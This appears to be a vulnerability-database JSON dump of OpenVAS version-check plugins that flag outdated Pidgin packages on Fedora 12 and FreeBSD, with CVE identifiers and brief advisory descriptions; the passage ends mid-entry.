{"pluginID": "1361412562310862297", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for pidgin FEDORA-2010-11315\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Pidgin allows you to talk to anyone using a variety of messaging\n protocols including AIM, MSN, Yahoo!, Jabber, Bonjour, Gadu-Gadu,\n ICQ, IRC, Novell Groupwise, QQ, Lotus Sametime, SILC, Simple and\n Zephyr. These protocols are implemented using a modular, easy to\n use design. To use a protocol, just add an account using the\n account editor.\n\n Pidgin supports many common features of other clients, as well as many\n unique features, such as perl scripting, TCL scripting and C plugins.\n \n Pidgin is not affiliated with or endorsed by America Online, Inc.,\n Microsoft Corporation, Yahoo! Inc., or ICQ Inc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"pidgin on Fedora 12\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-July/044628.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862297\");\n script_version(\"$Revision: 8469 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-19 08:58:21 +0100 (Fri, 19 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-08-02 12:38:17 +0200 (Mon, 02 Aug 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-11315\");\n script_cve_id(\"CVE-2010-2528\", \"CVE-2010-1624\", \"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\", \"CVE-2010-0013\");\n script_name(\"Fedora Update for pidgin FEDORA-2010-11315\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of pidgin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.7.2~1.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "history": [], "description": "Check for the Version of pidgin", "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862297", "type": "openvas", "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "3658421793d2f5b363bbda9c74eb8ca2"}, {"key": "cvss", "hash": "84813b1457b92d6ba1174abffbb83a2f"}, {"key": "description", "hash": "acc9b66136f23b6a0c0cbb5dc734c6d4"}, {"key": "href", "hash": "9f66d7be50ef5aa24b1efc7026531db3"}, {"key": "modified", "hash": "8acef1c33f73aafdb7cffe84eda8c2b1"}, {"key": "naslFamily", "hash": "be931514784f88df80712740ad2723e7"}, {"key": "pluginID", "hash": "bfcfc88f853c73b937576ae054875f72"}, {"key": "published", "hash": "40f37fe8cb81012fec588dd007656635"}, {"key": "references", "hash": "d89b406ca56396b14c248f5d5c077cc2"}, {"key": "reporter", "hash": "82db6d7eefdc19955bb78be9fb178ae1"}, {"key": "sourceData", "hash": "d4d6760ee43ebed594db484565d71010"}, {"key": "title", "hash": "ac2839b5abf6fb86929b8a1257de32e0"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "viewCount": 0, "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2010-July/044628.html", "2010-11315"], "lastseen": "2018-01-19T15:05:23", "published": "2010-08-02T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "cvelist": ["CVE-2010-0420", "CVE-2010-1624", "CVE-2010-0013", "CVE-2010-0423", "CVE-2010-0277", "CVE-2010-2528"], "id": "OPENVAS:1361412562310862297", "hash": "51488b9b22a673d30dcd75597e830c06ef04f65dc8a9e7dde2704ab3b8378ed5", "modified": "2018-01-19T00:00:00", "title": "Fedora Update for pidgin FEDORA-2010-11315", "edition": 1, "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "bulletinFamily": "scanner", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "vulnersScore": 7.5}}

{"openvas": [{"lastseen": "2018-01-22T13:06:20", "references": ["2010-8524", "http://lists.fedoraproject.org/pipermail/package-announce/2010-May/041846.html"], "pluginID": "1361412562310861963", "description": "Check for the Version of pidgin", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-05-28T00:00:00", "title": "Fedora Update for pidgin FEDORA-2010-8524", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-1624", "CVE-2010-0013", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2018-01-22T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310861963", "id": "OPENVAS:1361412562310861963", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for pidgin FEDORA-2010-8524\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Pidgin allows you to talk to anyone using a variety of messaging\n protocols including AIM, MSN, Yahoo!, Jabber, Bonjour, Gadu-Gadu,\n ICQ, IRC, Novell Groupwise, QQ, Lotus Sametime, SILC, Simple and\n Zephyr. These protocols are implemented using a modular, easy to\n use design. To use a protocol, just add an account using the\n account editor.\n\n Pidgin supports many common features of other clients, as well as many\n unique features, such as perl scripting, TCL scripting and C plugins.\n \n Pidgin is not affiliated with or endorsed by America Online, Inc.,\n Microsoft Corporation, Yahoo! Inc., or ICQ Inc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"pidgin on Fedora 12\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-May/041846.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.861963\");\n script_version(\"$Revision: 8485 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 08:57:57 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-28 10:00:59 +0200 (Fri, 28 May 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-8524\");\n script_cve_id(\"CVE-2010-1624\", \"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\", \"CVE-2010-0013\");\n script_name(\"Fedora Update for pidgin FEDORA-2010-8524\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of pidgin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.7.0~2.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-01-02T10:55:01", "references": ["2010-8524", "http://lists.fedoraproject.org/pipermail/package-announce/2010-May/041846.html"], "pluginID": "861963", "description": "Check for the Version of pidgin", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-05-28T00:00:00", "title": "Fedora Update for pidgin FEDORA-2010-8524", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-1624", "CVE-2010-0013", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2017-12-22T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=861963", "id": "OPENVAS:861963", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for pidgin FEDORA-2010-8524\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Pidgin allows you to talk to anyone using a variety of messaging\n protocols including AIM, MSN, Yahoo!, Jabber, Bonjour, Gadu-Gadu,\n ICQ, IRC, Novell Groupwise, QQ, Lotus Sametime, SILC, Simple and\n Zephyr. These protocols are implemented using a modular, easy to\n use design. To use a protocol, just add an account using the\n account editor.\n\n Pidgin supports many common features of other clients, as well as many\n unique features, such as perl scripting, TCL scripting and C plugins.\n \n Pidgin is not affiliated with or endorsed by America Online, Inc.,\n Microsoft Corporation, Yahoo! Inc., or ICQ Inc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"pidgin on Fedora 12\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-May/041846.html\");\n script_id(861963);\n script_version(\"$Revision: 8226 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-22 07:30:26 +0100 (Fri, 22 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-28 10:00:59 +0200 (Fri, 28 May 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-8524\");\n script_cve_id(\"CVE-2010-1624\", \"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\", \"CVE-2010-0013\");\n script_name(\"Fedora Update for pidgin FEDORA-2010-8524\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of pidgin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.7.0~2.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-12-21T11:33:28", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2010-July/044628.html", "2010-11315"], "pluginID": "862297", "description": "Check for the Version of pidgin", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-08-02T00:00:00", "title": "Fedora Update for pidgin FEDORA-2010-11315", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-1624", "CVE-2010-0013", "CVE-2010-0423", "CVE-2010-0277", "CVE-2010-2528"], "modified": "2017-12-21T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=862297", "id": "OPENVAS:862297", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for pidgin FEDORA-2010-11315\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Pidgin allows you to talk to anyone using a variety of messaging\n protocols including AIM, MSN, Yahoo!, Jabber, Bonjour, Gadu-Gadu,\n ICQ, IRC, Novell Groupwise, QQ, Lotus Sametime, SILC, Simple and\n Zephyr. These protocols are implemented using a modular, easy to\n use design. To use a protocol, just add an account using the\n account editor.\n\n Pidgin supports many common features of other clients, as well as many\n unique features, such as perl scripting, TCL scripting and C plugins.\n \n Pidgin is not affiliated with or endorsed by America Online, Inc.,\n Microsoft Corporation, Yahoo! Inc., or ICQ Inc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"pidgin on Fedora 12\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-July/044628.html\");\n script_id(862297);\n script_version(\"$Revision: 8205 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 07:30:37 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-08-02 12:38:17 +0200 (Mon, 02 Aug 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-11315\");\n script_cve_id(\"CVE-2010-2528\", \"CVE-2010-1624\", \"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\", \"CVE-2010-0013\");\n script_name(\"Fedora Update for pidgin FEDORA-2010-11315\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of pidgin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.7.2~1.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-12-21T11:32:21", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2010-November/050695.html", "2010-17130"], "pluginID": "1361412562310862541", "description": "Check for the Version of pidgin", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-11-16T00:00:00", "type": "openvas", "title": "Fedora Update for pidgin FEDORA-2010-17130", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-1624", "CVE-2010-0013", "CVE-2010-3711", "CVE-2010-0423", "CVE-2010-0277", "CVE-2010-2528"], "modified": "2017-12-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862541", "id": "OPENVAS:1361412562310862541", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for pidgin FEDORA-2010-17130\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Pidgin allows you to talk to anyone using a variety of messaging\n protocols including AIM, MSN, Yahoo!, Jabber, Bonjour, Gadu-Gadu,\n ICQ, IRC, Novell Groupwise, QQ, Lotus Sametime, SILC, Simple and\n Zephyr. These protocols are implemented using a modular, easy to\n use design. To use a protocol, just add an account using the\n account editor.\n\n Pidgin supports many common features of other clients, as well as many\n unique features, such as perl scripting, TCL scripting and C plugins.\n \n Pidgin is not affiliated with or endorsed by America Online, Inc.,\n Microsoft Corporation, Yahoo! Inc., or ICQ Inc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"pidgin on Fedora 12\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-November/050695.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862541\");\n script_version(\"$Revision: 8187 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-20 08:30:09 +0100 (Wed, 20 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-17130\");\n script_cve_id(\"CVE-2010-3711\", \"CVE-2010-2528\", \"CVE-2010-1624\", \"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\", \"CVE-2010-0013\");\n script_name(\"Fedora Update for pidgin FEDORA-2010-17130\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of pidgin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.7.5~1.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-12-12T11:10:38", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2010-November/050695.html", "2010-17130"], "pluginID": "862541", "description": "Check for the Version of pidgin", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-11-16T00:00:00", "title": "Fedora Update for pidgin FEDORA-2010-17130", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-1624", "CVE-2010-0013", "CVE-2010-3711", "CVE-2010-0423", "CVE-2010-0277", "CVE-2010-2528"], "modified": "2017-12-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=862541", "id": "OPENVAS:862541", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for pidgin FEDORA-2010-17130\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Pidgin allows you to talk to anyone using a variety of messaging\n protocols including AIM, MSN, Yahoo!, Jabber, Bonjour, Gadu-Gadu,\n ICQ, IRC, Novell Groupwise, QQ, Lotus Sametime, SILC, Simple and\n Zephyr. These protocols are implemented using a modular, easy to\n use design. To use a protocol, just add an account using the\n account editor.\n\n Pidgin supports many common features of other clients, as well as many\n unique features, such as perl scripting, TCL scripting and C plugins.\n \n Pidgin is not affiliated with or endorsed by America Online, Inc.,\n Microsoft Corporation, Yahoo! Inc., or ICQ Inc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"pidgin on Fedora 12\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-November/050695.html\");\n script_id(862541);\n script_version(\"$Revision: 8068 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-11 07:31:34 +0100 (Mon, 11 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-16 14:49:48 +0100 (Tue, 16 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-17130\");\n script_cve_id(\"CVE-2010-3711\", \"CVE-2010-2528\", \"CVE-2010-1624\", \"CVE-2010-0277\", \"CVE-2010-0420\", \"CVE-2010-0423\", \"CVE-2010-0013\");\n script_name(\"Fedora Update for pidgin FEDORA-2010-17130\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of pidgin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"pidgin\", rpm:\"pidgin~2.7.5~1.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-12-21T11:33:20", "references": [], "pluginID": "136141256231067360", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "edition": 1, "reporter": "Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com", "published": "2010-05-04T00:00:00", "type": "openvas", "title": "FreeBSD Ports: pidgin", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-0420", "CVE-2010-0013", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2017-12-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231067360", "id": "OPENVAS:136141256231067360", "sourceData": "#\n#VID a2c4d3d5-4c7b-11df-83fb-0015587e2cc1\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID a2c4d3d5-4c7b-11df-83fb-0015587e2cc1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2010 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n pidgin\n libpurple\n\nCVE-2010-0277\nslp.c in the MSN protocol plugin in libpurple in Pidgin before 2.6.6,\nincluding 2.6.4, and Adium 1.3.8 allows remote attackers to cause a\ndenial of service (memory corruption and application crash) or\npossibly have unspecified other impact via a malformed MSNSLP INVITE\nrequest in an SLP message, a different issue than CVE-2010-0013.\n\nCVE-2010-0420\nlibpurple in Finch in Pidgin before 2.6.6, when an XMPP multi-user\nchat (MUC) room is used, does not properly parse nicknames containing\n<br> sequences, which allows remote attackers to cause a denial of\nservice (application crash) via a crafted nickname.\n\nCVE-2010-0423\ngtkimhtml.c in Pidgin before 2.6.6 allows remote attackers to cause a\ndenial of service (CPU consumption and application hang) by sending\nmany smileys in a (1) IM or (2) chat.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware 